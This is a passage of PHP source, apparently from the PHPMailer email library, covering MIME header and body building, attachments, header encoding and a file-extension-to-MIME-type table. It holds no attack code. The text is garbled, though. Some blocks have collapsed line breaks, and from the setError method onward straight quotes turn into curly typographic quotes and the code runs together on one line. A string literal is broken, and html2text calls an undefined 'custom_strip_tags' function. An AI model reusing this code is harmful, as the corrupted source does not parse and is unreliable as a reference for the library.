        // sendmail and mail() extract Cc from the header before sending
        if (count($this->cc) > 0) {
            $result .= $this->addrAppend('Cc', $this->cc);
        }

        // sendmail and mail() extract Bcc from the header before sending
        if ((
                $this->Mailer == 'sendmail' or $this->Mailer == 'qmail' or $this->Mailer == 'mail'
            )
            and count($this->bcc) > 0
        ) {
            $result .= $this->addrAppend('Bcc', $this->bcc);
        }

        if (count($this->ReplyTo) > 0) {
            $result .= $this->addrAppend('Reply-To', $this->ReplyTo);
        }

        // mail() sets the subject itself
        if ($this->Mailer != 'mail') {
            $result .= $this->headerLine('Subject', $this->encodeHeader($this->secureHeader($this->Subject)));
        }

        if ($this->MessageID != '') {
            $this->lastMessageID = $this->MessageID;
        } else {
            $this->lastMessageID = sprintf('<%s@%s>', $uniq_id, $this->ServerHostname());
        }
        $result .= $this->HeaderLine('Message-ID', $this->lastMessageID);
        $result .= $this->headerLine('X-Priority', $this->Priority);
        if ($this->XMailer == '') {
            $result .= $this->headerLine(
                'X-Mailer',
                'PHPMailer ' . $this->Version . ' (https://github.com/PHPMailer/PHPMailer/)'
            );
        } else {
            $myXmailer = trim($this->XMailer);
            if ($myXmailer) {
                $result .= $this->headerLine('X-Mailer', $myXmailer);
            }
        }

        if ($this->ConfirmReadingTo != '') {
            $result .= $this->headerLine('Disposition-Notification-To', '<' . trim($this->ConfirmReadingTo) . '>');
        }

        // Add custom headers
        for ($index = 0; $index < count($this->CustomHeader); $index++) {
            $result .= $this->headerLine(
                trim($this->CustomHeader[$index][0]),
                $this->encodeHeader(trim($this->CustomHeader[$index][1]))
            );
        }
        if (!$this->sign_key_file) {
            $result .= $this->headerLine('MIME-Version', '1.0');
            $result .= $this->getMailMIME();
        }

        return $result;
    }

    public function getMailMIME()
    {
        $result = '';
        $ismultipart = true;
        switch ($this->message_type) {
            case 'inline':
                $result .= $this->headerLine('Content-Type', 'multipart/related;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            case 'attach':
            case 'inline_attach':
            case 'alt_attach':
            case 'alt_inline_attach':
                $result .= $this->headerLine('Content-Type', 'multipart/mixed;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            case 'alt':
            case 'alt_inline':
                $result .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
                break;
            default:
                // Catches case 'plain': and case '':
                $result .= $this->textLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet);
                $ismultipart = false;
                break;
        }
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($this->Encoding != '7bit') {
            // RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE
            if ($ismultipart) {
                if ($this->Encoding == '8bit') {
                    $result .= $this->headerLine('Content-Transfer-Encoding', '8bit');
                }
                // The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible
            } else {
                $result .= $this->headerLine('Content-Transfer-Encoding', $this->Encoding);
            }
        }

        if ($this->Mailer != 'mail') {
            $result .= $this->LE;
        }

        return $result;
    }

    public function getSentMIMEMessage()
    {
        return $this->MIMEHeader . $this->mailHeader . self::CRLF . $this->MIMEBody;
    }


    public function createBody()
    {
        $body = '';

        if ($this->sign_key_file) {
            $body .= $this->getMailMIME() . $this->LE;
        }

        $this->setWordWrap();

        $bodyEncoding = $this->Encoding;
        $bodyCharSet = $this->CharSet;
        if ($bodyEncoding == '8bit' and !$this->has8bitChars($this->Body)) {
            $bodyEncoding = '7bit';
            $bodyCharSet = 'us-ascii';
        }
        $altBodyEncoding = $this->Encoding;
        $altBodyCharSet = $this->CharSet;
        if ($altBodyEncoding == '8bit' and !$this->has8bitChars($this->AltBody)) {
            $altBodyEncoding = '7bit';
            $altBodyCharSet = 'us-ascii';
        }
        switch ($this->message_type) {
            case 'inline':
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[1]);
                break;
            case 'attach':
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'inline_attach':
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'alt':
                $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                if (!empty($this->Ical)) {
                    $body .= $this->getBoundary($this->boundary[1], '', 'text/calendar; method=REQUEST', '');
                    $body .= $this->encodeString($this->Ical, $this->Encoding);
                    $body .= $this->LE . $this->LE;
                }
                $body .= $this->endBoundary($this->boundary[1]);
                break;
            case 'alt_inline':
                $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->endBoundary($this->boundary[1]);
                break;
            case 'alt_attach':
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->endBoundary($this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            case 'alt_inline_attach':
                $body .= $this->textLine('--' . $this->boundary[1]);
                $body .= $this->headerLine('Content-Type', 'multipart/alternative;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding);
                $body .= $this->encodeString($this->AltBody, $altBodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->textLine('--' . $this->boundary[2]);
                $body .= $this->headerLine('Content-Type', 'multipart/related;');
                $body .= $this->textLine("\tboundary=\"" . $this->boundary[3] . '"');
                $body .= $this->LE;
                $body .= $this->getBoundary($this->boundary[3], $bodyCharSet, 'text/html', $bodyEncoding);
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                $body .= $this->LE . $this->LE;
                $body .= $this->attachAll('inline', $this->boundary[3]);
                $body .= $this->LE;
                $body .= $this->endBoundary($this->boundary[2]);
                $body .= $this->LE;
                $body .= $this->attachAll('attachment', $this->boundary[1]);
                break;
            default:
                // catch case 'plain' and case ''
                $body .= $this->encodeString($this->Body, $bodyEncoding);
                break;
        }

        if ($this->isError()) {
            $body = '';
        } elseif ($this->sign_key_file) {
            try {
                if (!defined('PKCS7_TEXT')) {
                    throw new phpmailerException($this->lang('signing') . ' OpenSSL extension missing.');
                }
                // @TODO would be nice to use php://temp streams here, but need to wrap for PHP < 5.1                 $file = tempnam(sys_get_temp_dir(), 'mail');                 if (false === file_put_contents($file, $body)) {                     throw new phpmailerException($this->lang('signing') . ' Could not write temp file');
                }
                $signed = tempnam(sys_get_temp_dir(), 'signed');
                if (@openssl_pkcs7_sign(
                    $file,
                    $signed,
                    'file://' . realpath($this->sign_cert_file),
                    array('file://' . realpath($this->sign_key_file), $this->sign_key_pass),
                    null
                )
                ) {
                    @unlink($file);
                    $body = file_get_contents($signed);
                    @unlink($signed);
                } else {
                    @unlink($file);
                    @unlink($signed);
                    throw new phpmailerException($this->lang('signing') . openssl_error_string());
                }
            } catch (phpmailerException $exc) {
                $body = '';
                if ($this->exceptions) {
                    throw $exc;
                }
            }
        }
        return $body;
    }

    protected function getBoundary($boundary, $charSet, $contentType, $encoding)
    {
        $result = '';
        if ($charSet == '') {
            $charSet = $this->CharSet;
        }
        if ($contentType == '') {
            $contentType = $this->ContentType;
        }
        if ($encoding == '') {
            $encoding = $this->Encoding;
        }
        $result .= $this->textLine('--' . $boundary);
        $result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet);
        $result .= $this->LE;
        // RFC1341 part 5 says 7bit is assumed if not specified
        if ($encoding != '7bit') {
            $result .= $this->headerLine('Content-Transfer-Encoding', $encoding);
        }
        $result .= $this->LE;

        return $result;
    }

    protected function endBoundary($boundary)
    {
        return $this->LE . '--' . $boundary . '--' . $this->LE;
    }

    protected function setMessageType()
    {
        $type = array();
        if ($this->alternativeExists()) {
            $type[] = 'alt';
        }
        if ($this->inlineImageExists()) {
            $type[] = 'inline';
        }
        if ($this->attachmentExists()) {
            $type[] = 'attach';
        }
        $this->message_type = implode('_', $type);
        if ($this->message_type == '') {
            $this->message_type = 'plain';
        }
    }

    public function headerLine($name, $value)
    {
        return $name . ': ' . $value . $this->LE;
    }

    public function textLine($value)
    {
        return $value . $this->LE;
    }

    public function addAttachment($path, $name = '', $encoding = 'base64', $type = '', $disposition = 'attachment')
    {
        try {
            if (!@is_file($path)) {
                throw new phpmailerException($this->lang('file_access') . $path, self::STOP_CONTINUE);
            }

            // If a MIME type is not specified, try to work it out from the file name
            if ($type == '') {
                $type = self::filenameToType($path);
            }

            $filename = basename($path);
            if ($name == '') {
                $name = $filename;
            }

            $this->attachment[] = array(
                0 => $path,
                1 => $filename,
                2 => $name,
                3 => $encoding,
                4 => $type,
                5 => false, // isStringAttachment
                6 => $disposition,
                7 => 0
            );

        } catch (phpmailerException $exc) {
            $this->setError($exc->getMessage());
            $this->edebug($exc->getMessage());
            if ($this->exceptions) {
                throw $exc;
            }
            return false;
        }
        return true;
    }

    public function getAttachments()
    {
        return $this->attachment;
    }

    protected function attachAll($disposition_type, $boundary)
    {
        // Return text of body
        $mime = array();
        $cidUniq = array();
        $incl = array();

        // Add all attachments
        foreach ($this->attachment as $attachment) {
            // Check if it is a valid disposition_filter
            if ($attachment[6] == $disposition_type) {
                // Check for string attachment
                $string = '';
                $path = '';
                $bString = $attachment[5];
                if ($bString) {
                    $string = $attachment[0];
                } else {
                    $path = $attachment[0];
                }

                $inclhash = md5(serialize($attachment));
                if (in_array($inclhash, $incl)) {
                    continue;
                }
                $incl[] = $inclhash;
                $name = $attachment[2];
                $encoding = $attachment[3];
                $type = $attachment[4];
                $disposition = $attachment[6];
                $cid = $attachment[7];
                if ($disposition == 'inline' && isset($cidUniq[$cid])) {
                    continue;
                }
                $cidUniq[$cid] = true;

                $mime[] = sprintf('--%s%s', $boundary, $this->LE);
                $mime[] = sprintf(
                    'Content-Type: %s; name="%s"%s',
                    $type,
                    $this->encodeHeader($this->secureHeader($name)),
                    $this->LE
                );
                // RFC1341 part 5 says 7bit is assumed if not specified
                if ($encoding != '7bit') {
                    $mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, $this->LE);
                }

                if ($disposition == 'inline') {
                    $mime[] = sprintf('Content-ID: <%s>%s', $cid, $this->LE);
                }

                // If a filename contains any of these chars, it should be quoted,
                // but not otherwise: RFC2183 & RFC2045 5.1
                // Fixes a warning in IETF's msglint MIME checker
                // Allow for bypassing the Content-Disposition header totally
                if (!(empty($disposition))) {
                    $encoded_name = $this->encodeHeader($this->secureHeader($name));
                    if (preg_match('/[ \(\)<>@,;:\\"\/\[\]\?=]/', $encoded_name)) {
                        $mime[] = sprintf(
                            'Content-Disposition: %s; filename="%s"%s',
                            $disposition,
                            $encoded_name,
                            $this->LE . $this->LE
                        );
                    } else {
                        $mime[] = sprintf(
                            'Content-Disposition: %s; filename=%s%s',
                            $disposition,
                            $encoded_name,
                            $this->LE . $this->LE
                        );
                    }
                } else {
                    $mime[] = $this->LE;
                }

                // Encode as string attachment
                if ($bString) {
                    $mime[] = $this->encodeString($string, $encoding);
                    if ($this->isError()) {
                        return '';
                    }
                    $mime[] = $this->LE . $this->LE;
                } else {
                    $mime[] = $this->encodeFile($path, $encoding);
                    if ($this->isError()) {
                        return '';
                    }
                    $mime[] = $this->LE . $this->LE;
                }
            }
        }

        $mime[] = sprintf('--%s--%s', $boundary, $this->LE);

        return implode('', $mime);
    }

    protected function encodeFile($path, $encoding = 'base64')
    {
        try {
            if (!is_readable($path)) {
                throw new phpmailerException($this->lang('file_open') . $path, self::STOP_CONTINUE);
            }
            $magic_quotes = get_magic_quotes_runtime();
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '<')) {                     set_magic_quotes_runtime(false);                 } else {                     ini_set('magic_quotes_runtime', 0);                 }             }             $file_buffer = file_get_contents($path);             $file_buffer = $this->encodeString($file_buffer, $encoding);
            if ($magic_quotes) {
                if (version_compare(PHP_VERSION, '5.3.0', '<')) {                     set_magic_quotes_runtime($magic_quotes);                 } else {                     ini_set('magic_quotes_runtime', ($magic_quotes?'1':'0'));                 }             }             return $file_buffer;         } catch (Exception $exc) {             $this->setError($exc->getMessage());
            return '';
        }
    }

    public function encodeString($str, $encoding = 'base64')
    {
        $encoded = '';
        switch (strtolower($encoding)) {
            case 'base64':
                $encoded = chunk_split(base64_encode($str), 76, $this->LE);
                break;
            case '7bit':
            case '8bit':
                $encoded = $this->fixEOL($str);
                // Make sure it ends with a line break
                if (substr($encoded, -(strlen($this->LE))) != $this->LE) {
                    $encoded .= $this->LE;
                }
                break;
            case 'binary':
                $encoded = $str;
                break;
            case 'quoted-printable':
                $encoded = $this->encodeQP($str);
                break;
            default:
                $this->setError($this->lang('encoding') . $encoding);
                break;
        }
        return $encoded;
    }

    public function encodeHeader($str, $position = 'text')
    {
        $matchcount = 0;
        switch (strtolower($position)) {
            case 'phrase':
                if (!preg_match('/[\200-\377]/', $str)) {
                    // Can't use addslashes as we don't know the value of magic_quotes_sybase
                    $encoded = addcslashes($str, "\0..\37\177\\\"");
                    if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) {
                        return ($encoded);
                    } else {
                        return ("\"$encoded\"");
                    }
                }
                $matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches);
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                $matchcount = preg_match_all('/[()"]/', $str, $matches);
                // Intentional fall-through
            case 'text':
            default:
                $matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches);
                break;
        }

        if ($matchcount == 0) { // There are no chars that need encoding
            return ($str);
        }

        $maxlen = 75 - 7 - strlen($this->CharSet);
        // Try to select the encoding which should produce the shortest output
        if ($matchcount > strlen($str) / 3) {
            // More than a third of the content will need encoding, so B encoding will be most efficient
            $encoding = 'B';
            if (function_exists('mb_strlen') && $this->hasMultiBytes($str)) {
                $encoded = $this->base64EncodeWrapMB($str, "\n");
            } else {
                $encoded = base64_encode($str);
                $maxlen -= $maxlen % 4;
                $encoded = trim(chunk_split($encoded, $maxlen, "\n"));
            }
        } else {
            $encoding = 'Q';
            $encoded = $this->encodeQ($str, $position);
            $encoded = $this->wrapText($encoded, $maxlen, true);
            $encoded = str_replace('=' . self::CRLF, "\n", trim($encoded));
        }

        $encoded = preg_replace('/^(.*)$/m', ' =?' . $this->CharSet . "?$encoding?\\1?=", $encoded);
        $encoded = trim(str_replace("\n", $this->LE, $encoded));

        return $encoded;
    }


    public function hasMultiBytes($str)
    {
        if (function_exists('mb_strlen')) {
            return (strlen($str) > mb_strlen($str, $this->CharSet));
        } else { // Assume no multibytes (we can't handle without mbstring functions anyway)
            return false;
        }
    }


    public function has8bitChars($text)
    {
        return (boolean)preg_match('/[\x80-\xFF]/', $text);
    }


    public function base64EncodeWrapMB($str, $linebreak = null)
    {
        $start = '=?' . $this->CharSet . '?B?';
        $end = '?=';
        $encoded = '';
        if ($linebreak === null) {
            $linebreak = $this->LE;
        }

        $mb_length = mb_strlen($str, $this->CharSet);
        // Each line must have length <= 75, including $start and $end
        $length = 75 - strlen($start) - strlen($end);
        // Average multi-byte ratio
        $ratio = $mb_length / strlen($str);
        // Base64 has a 4:3 ratio
        $avgLength = floor($length * $ratio * .75);

        for ($i = 0; $i < $mb_length; $i += $offset) {             $lookBack = 0;             do {                 $offset = $avgLength - $lookBack;                 $chunk = mb_substr($str, $i, $offset, $this->CharSet);
                $chunk = base64_encode($chunk);
                $lookBack++;
            } while (strlen($chunk) > $length);
            $encoded .= $chunk . $linebreak;
        }

        // Chomp the last linefeed
        $encoded = substr($encoded, 0, -strlen($linebreak));
        return $encoded;
    }


    public function encodeQP($string, $line_max = 76)
    {
        if (function_exists('quoted_printable_encode')) { // Use native function if it's available (>= PHP5.3)
            return $this->fixEOL(quoted_printable_encode($string));
        }
        // Fall back to a pure PHP implementation
        $string = str_replace(
            array('%20', '%0D%0A.', '%0D%0A', '%'),
            array(' ', "\r\n=2E", "\r\n", '='),
            rawurlencode($string)
        );
        $string = preg_replace('/[^\r\n]{' . ($line_max - 3) . '}[^=\r\n]{2}/', "$0=\r\n", $string);
        return $this->fixEOL($string);
    }


    public function encodeQPphp(
        $string,
        $line_max = 76,
        /** @noinspection PhpUnusedParameterInspection */ $space_conv = false
    ) {
        return $this->encodeQP($string, $line_max);
    }


    public function encodeQ($str, $position = 'text')
    {
        // There should not be any EOL in the string
        $pattern = '';
        $encoded = str_replace(array("\r", "\n"), '', $str);
        switch (strtolower($position)) {
            case 'phrase':
                // RFC 2047 section 5.3
                $pattern = '^A-Za-z0-9!*+\/ -';
                break;
            /** @noinspection PhpMissingBreakStatementInspection */
            case 'comment':
                // RFC 2047 section 5.2
                $pattern = '\(\)"';

            case 'text':
            default:

                $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern;
                break;
        }
        $matches = array();
        if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) {

            $eqkey = array_search('=', $matches[0]);
            if (false !== $eqkey) {
                unset($matches[0][$eqkey]);
                array_unshift($matches[0], '=');
            }
            foreach (array_unique($matches[0]) as $char) {
                $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded);
            }
        }
        // Replace every spaces to _ (more readable than =20)
        return str_replace(' ', '_', $encoded);
    }


    public function addStringAttachment(
        $string,
        $filename,
        $encoding = 'base64',
        $type = '',
        $disposition = 'attachment'
    ) {
        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($filename);
        }
        // Append to $attachment array
        $this->attachment[] = array(
            0 => $string,
            1 => $filename,
            2 => basename($filename),
            3 => $encoding,
            4 => $type,
            5 => true, // isStringAttachment
            6 => $disposition,
            7 => 0
        );
    }

    public function addEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline')
    {
        if (!@is_file($path)) {
            $this->setError($this->lang('file_access') . $path);
            return false;
        }

        // If a MIME type is not specified, try to work it out from the file name
        if ($type == '') {
            $type = self::filenameToType($path);
        }

        $filename = basename($path);
        if ($name == '') {
            $name = $filename;
        }

        // Append to $attachment array
        $this->attachment[] = array(
            0 => $path,
            1 => $filename,
            2 => $name,
            3 => $encoding,
            4 => $type,
            5 => false, // isStringAttachment
            6 => $disposition,
            7 => $cid
        );
        return true;
    }


    public function addStringEmbeddedImage(
        $string,
        $cid,
        $name = '',
        $encoding = 'base64',
        $type = '',
        $disposition = 'inline'
    ) {
        // If a MIME type is not specified, try to work it out from the name
        if ($type == '') {
            $type = self::filenameToType($name);
        }

        // Append to $attachment array
        $this->attachment[] = array(
            0 => $string,
            1 => $name,
            2 => $name,
            3 => $encoding,
            4 => $type,
            5 => true, // isStringAttachment
            6 => $disposition,
            7 => $cid
        );
        return true;
    }

    public function inlineImageExists()
    {
        foreach ($this->attachment as $attachment) {
            if ($attachment[6] == 'inline') {
                return true;
            }
        }
        return false;
    }

    public function attachmentExists()
    {
        foreach ($this->attachment as $attachment) {
            if ($attachment[6] == 'attachment') {
                return true;
            }
        }
        return false;
    }

    public function alternativeExists()
    {
        return !empty($this->AltBody);
    }

    public function clearAddresses()
    {
        foreach ($this->to as $to) {
            unset($this->all_recipients[strtolower($to[0])]);
        }
        $this->to = array();
    }

    public function clearCCs()
    {
        foreach ($this->cc as $cc) {
            unset($this->all_recipients[strtolower($cc[0])]);
        }
        $this->cc = array();
    }

    public function clearBCCs()
    {
        foreach ($this->bcc as $bcc) {
            unset($this->all_recipients[strtolower($bcc[0])]);
        }
        $this->bcc = array();
    }

    public function clearReplyTos()
    {
        $this->ReplyTo = array();
    }


    public function clearAllRecipients()
    {
        $this->to = array();
        $this->cc = array();
        $this->bcc = array();
        $this->all_recipients = array();
    }

    public function clearAttachments()
    {
        $this->attachment = array();
    }

    public function clearCustomHeaders()
    {
        $this->CustomHeader = array();
    }

    protected function setError($msg)
    {
        $this->error_count++;
        if ($this->Mailer == 'smtp' and !is_null($this->smtp)) {
            $lasterror = $this->smtp->getError();
            if (!empty($lasterror) and array_key_exists('smtp_msg', $lasterror)) {
                $msg .= '

‘ . $this->lang(‘smtp_error’) . $lasterror[‘smtp_msg’] . ”

\n”; } } $this->ErrorInfo = $msg; } public static function rfcDate() { // Set the time zone to whatever the default is to avoid 500 errors // Will default to UTC if it’s not set properly in php.ini date_default_timezone_set(@date_default_timezone_get()); return date(‘D, j M Y H:i:s O’); } protected function serverHostname() { $result = ‘localhost.localdomain’; if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif (isset($_SERVER) and array_key_exists(‘SERVER_NAME’, $_SERVER) and !empty($_SERVER[‘SERVER_NAME’])) { $result = $_SERVER[‘SERVER_NAME’]; } elseif (function_exists(‘gethostname’) && gethostname() !== false) { $result = gethostname(); } elseif (php_uname(‘n’) !== false) { $result = php_uname(‘n’); } return $result; } protected function lang($key) { if (count($this->language) < 1) { $this->setLanguage(‘en’); // set the default language } if (isset($this->language[$key])) { return $this->language[$key]; } else { return ‘Language string failed to load: ‘ . $key; } } public function isError() { return ($this->error_count > 0); } public function fixEOL($str) { // Normalise to \n $nstr = str_replace(array(“\r\n”, “\r”), “\n”, $str); // Now convert LE as needed if ($this->LE !== “\n”) { $nstr = str_replace(“\n”, $this->LE, $nstr); } return $nstr; } public function addCustomHeader($name, $value = null) { if ($value === null) { // Value passed in as name:value $this->CustomHeader[] = explode(‘:’, $name, 2); } else { $this->CustomHeader[] = array($name, $value); } } public function msgHTML($message, $basedir = ”, $advanced = false) { preg_match_all(‘/(src|background)=[“\’](.*)[“\’]/Ui’, $message, $images); if (isset($images[2])) { foreach ($images[2] as $imgindex => $url) { // Convert data URIs into embedded images if (preg_match(‘#^data:(image[^;,]*)(;base64)?,#’, $url, $match)) { $data = substr($url, strpos($url, ‘,’)); if ($match[2]) { $data = base64_decode($data); } else { $data = rawurldecode($data); } $cid = md5($url) . ‘@phpmailer.0’; // RFC2392 S 2 if ($this->addStringEmbeddedImage($data, $cid, ”, ‘base64’, $match[1])) { $message = str_replace( $images[0][$imgindex], $images[1][$imgindex] . ‘=”cid:’ . $cid . ‘”‘, $message ); } } elseif (!preg_match(‘#^[A-z]+://#’, $url)) { // Do not change urls for absolute images (thanks to corvuscorax) $filename = basename($url); $directory = dirname($url); if ($directory == ‘.’) { $directory = ”; } $cid = md5($url) . ‘@phpmailer.0’; // RFC2392 S 2 if (strlen($basedir) > 1 && substr($basedir, -1) != ‘/’) { $basedir .= ‘/’; } if (strlen($directory) > 1 && substr($directory, -1) != ‘/’) { $directory .= ‘/’; } if ($this->addEmbeddedImage( $basedir . $directory . $filename, $cid, $filename, ‘base64’, self::_mime_types((string)self::mb_pathinfo($filename, PATHINFO_EXTENSION)) ) ) { $message = preg_replace( ‘/’ . $images[1][$imgindex] . ‘=[“\’]’ . preg_quote($url, ‘/’) . ‘[“\’]/Ui’, $images[1][$imgindex] . ‘=”cid:’ . $cid . ‘”‘, $message ); } } } } $this->isHTML(true); // Convert all message body line breaks to CRLF, makes quoted-printable encoding work much better $this->Body = $this->normalizeBreaks($message); $this->AltBody = $this->normalizeBreaks($this->html2text($message, $advanced)); if (empty($this->AltBody)) { $this->AltBody = ‘To view this email message, open it in a program that understands HTML!’ . self::CRLF . self::CRLF; } return $this->Body; } public function html2text($html, $advanced = false) { if (is_callable($advanced)) { return call_user_func($advanced, $html); } return html_entity_decode( trim(custom_strip_tags(preg_replace(‘/<(head|title|style|script)[^>]*>.*?<\/\\1>/si’, ”, $html))), ENT_QUOTES, $this->CharSet ); } public static function _mime_types($ext = ”) { $mimes = array( ‘xl’ => ‘application/excel’, ‘js’ => ‘application/javascript’, ‘hqx’ => ‘application/mac-binhex40’, ‘cpt’ => ‘application/mac-compactpro’, ‘bin’ => ‘application/macbinary’, ‘doc’ => ‘application/msword’, ‘word’ => ‘application/msword’, ‘class’ => ‘application/octet-stream’, ‘dll’ => ‘application/octet-stream’, ‘dms’ => ‘application/octet-stream’, ‘exe’ => ‘application/octet-stream’, ‘lha’ => ‘application/octet-stream’, ‘lzh’ => ‘application/octet-stream’, ‘psd’ => ‘application/octet-stream’, ‘sea’ => ‘application/octet-stream’, ‘so’ => ‘application/octet-stream’, ‘oda’ => ‘application/oda’, ‘pdf’ => ‘application/pdf’, ‘ai’ => ‘application/postscript’, ‘eps’ => ‘application/postscript’, ‘ps’ => ‘application/postscript’, ‘smi’ => ‘application/smil’, ‘smil’ => ‘application/smil’, ‘mif’ => ‘application/vnd.mif’, ‘xls’ => ‘application/vnd.ms-excel’, ‘ppt’ => ‘application/vnd.ms-powerpoint’, ‘wbxml’ => ‘application/vnd.wap.wbxml’, ‘wmlc’ => ‘application/vnd.wap.wmlc’, ‘dcr’ => ‘application/x-director’, ‘dir’ => ‘application/x-director’, ‘dxr’ => ‘application/x-director’, ‘dvi’ => ‘application/x-dvi’, ‘gtar’ => ‘application/x-gtar’, ‘php3’ => ‘application/x-httpd-php’, ‘php4’ => ‘application/x-httpd-php’, ‘php’ => ‘application/x-httpd-php’, ‘phtml’ => ‘application/x-httpd-php’, ‘phps’ => ‘application/x-httpd-php-source’, ‘swf’ => ‘application/x-shockwave-flash’, ‘sit’ => ‘application/x-stuffit’, ‘tar’ => ‘application/x-tar’, ‘tgz’ => ‘application/x-tar’, ‘xht’ => ‘application/xhtml+xml’, ‘xhtml’ => ‘application/xhtml+xml’, ‘zip’ => ‘application/zip’, ‘mid’ => ‘audio/midi’, ‘midi’ => ‘audio/midi’, ‘mp2’ => ‘audio/mpeg’, ‘mp3’ => ‘audio/mpeg’, ‘mpga’ => ‘audio/mpeg’, ‘aif’ => ‘audio/x-aiff’, ‘aifc’ => ‘audio/x-aiff’, ‘aiff’ => ‘audio/x-aiff’, ‘ram’ => ‘audio/x-pn-realaudio’, ‘rm’ => ‘audio/x-pn-realaudio’, ‘rpm’ => ‘audio/x-pn-realaudio-plugin’, ‘ra’ => ‘audio/x-realaudio’, ‘wav’ => ‘audio/x-wav’, ‘bmp’ => ‘image/bmp’, ‘gif’ => ‘image/gif’, ‘jpeg’ => ‘image/jpeg’, ‘jpe’ => ‘image/jpeg’, ‘jpg’ => ‘image/jpeg’, ‘png’ => ‘image/png’, ‘tiff’ => ‘image/tiff’, ‘tif’ => ‘image/tiff’, ‘eml’ => ‘message/rfc822’, ‘css’ => ‘text/css’, ‘html’ => ‘text/html’, ‘htm’ => ‘text/html’, ‘shtml’ => ‘text/html’, ‘log’ => ‘text/plain’, ‘text’ => ‘text/plain’, ‘txt’ => ‘text/plain’, ‘rtx’ => ‘text/richtext’, ‘rtf’ => ‘text/rtf’, ‘vcf’ => ‘text/vcard’, ‘vcard’ => ‘text/vcard’, ‘xml’ => ‘text/xml’, ‘xsl’ => ‘text/xml’, ‘mpeg’ => ‘video/mpeg’, ‘mpe’ => ‘video/mpeg’, ‘mpg’ => ‘video/mpeg’, ‘mov’ => ‘video/quicktime’, ‘qt’ => ‘video/quicktime’, ‘rv’ => ‘video/vnd.rn-realvideo’, ‘avi’ => ‘video/x-msvideo’, ‘movie’ => ‘video/x-sgi-movie’ ); return (array_key_exists(strtolower($ext), $mimes) ? $mimes[strtolower($ext)]: ‘application/octet-stream’); } public static function filenameToType($filename) { // In case the path is a URL, strip any query string before getting extension $qpos = strpos($filename, ‘?’); if (false !== $qpos) { $filename = substr($filename, 0, $qpos); } $pathinfo = self::mb_pathinfo($filename); return self::_mime_types($pathinfo[‘extension’]); } public static function mb_pathinfo($path, $options = null) { $ret = array(‘dirname’ => ”, ‘basename’ => ”, ‘extension’ => ”, ‘filename’ 